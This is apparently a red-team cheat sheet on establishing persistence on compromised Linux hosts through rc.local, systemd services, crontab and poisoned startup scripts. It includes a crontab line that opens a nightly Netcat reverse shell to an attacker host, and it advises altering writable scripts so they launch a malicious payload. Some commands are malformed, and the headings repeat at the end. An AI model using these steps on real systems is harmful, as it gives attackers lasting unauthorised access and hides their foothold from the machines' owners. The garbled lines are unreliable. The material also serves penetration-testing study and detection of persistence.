Linux Persistence

Linux Persistence
- rc.local
- Linux Service
- Crontab
- Poisoning Existing Scripts

LINUX PERSISTENCE

RC.LOCAL

Add full path to rc.local file. This full path will be executed on system startup.

nano /etc/rc.local
# or
echo "<FILE_PATH>" >> /etc/rc.local

LINUX SERVICE

Create/Open new service file using nano

nano /etc/systemd/system/<SERVICE_NAME>.service

Add service information to file. <FILE_PATH> is full path to .sh file to execute on startup.

[Unit]
after=network.targetDescription=My Service description
 
 
[Service]
Type=simple
Restart=always
ExecStart=<FILE_PATH>
 
[Install]
WantedBy=multi-user.target

Reload service manager

systemctl daemon-reload

Enable the service

systemctl enable <SERVICE_NAME>.service

Start the service persistence

systemctl start <SERVICE_NAME>.service

CRONTAB

More info at: https://crontab.guru/

Create cron that runs a Netcat reverse shell every day at midnight

# Open new crontab:
crontab -e
 
# Add the following line at the end:
0 0 * * * nc <ATTACKER_IP> <ATTACKER_PORT> -e /bin/sh

Create cron that runs a payload every day at midnight

# Open new crontab:
crontab -e
 
# Add the following line at the end:
crontab -e 0 0 * * * <FULLPATH>

POISONING EXISTING SCRIPTS

Enumerate all persistence methods discussed in this section looking for existing persistence that has been created via script files such as .sh, .py, etc.
If those are modifiable, modify them to launch a malicious uploaded payload.

LINUX PERSISTENCE​

RC.LOCAL​

LINUX SERVICE​

CRONTAB​

POISONING EXISTING SCRIPTS​

LINUX PERSISTENCE

RC.LOCAL

LINUX SERVICE

CRONTAB

POISONING EXISTING SCRIPTS